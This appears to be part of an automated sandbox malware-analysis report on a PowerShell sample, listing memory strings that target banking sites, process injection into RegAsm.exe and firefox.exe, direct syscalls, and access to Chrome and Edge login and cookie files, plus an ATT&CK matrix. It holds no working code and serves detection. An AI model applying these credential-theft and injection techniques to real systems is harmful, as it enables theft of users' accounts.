Source: 6511-iOQ--.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 6511-iOQ--.13.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 6511-iOQ--.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413~
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169650141
Source: 6511-iOQ--.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: 6511-iOQ--.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.2061765313.00000216E817C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: saction PasswordVMware20,11696501413^
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 6511-iOQ--.13.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696Y
Source: 6511-iOQ--.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: runonce.exe, 0000000D.00000003.1756736081.0000000004801000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1766357987.0000000004801000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1qEmuSW3rOVU9h0g7a9n.exe
Source: 6511-iOQ--.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 6511-iOQ--.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 6511-iOQ--.13.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 6511-iOQ--.13.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 6511-iOQ--.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 6511-iOQ--.13.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 6511-iOQ--.13.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2537936236.0000000001209000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: 6511-iOQ--.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 6511-iOQ--.13.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,116965
Source: 6511-iOQ--.13.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: 6511-iOQ--.13.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6E4008	Jump to behavior

Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2537368259.0000000001771000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000000.1672771134.0000000001770000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000000.1817552470.0000000001770000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2537368259.0000000001771000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000000.1672771134.0000000001770000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000000.1817552470.0000000001770000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2537368259.0000000001771000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000000.1672771134.0000000001770000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000000.1817552470.0000000001770000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000002.2537368259.0000000001771000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000C.00000000.1672771134.0000000001770000.00000002.00000001.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000000.1817552470.0000000001770000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\laser.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report laser.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
laser.ps1

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	113 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	612 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	612 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement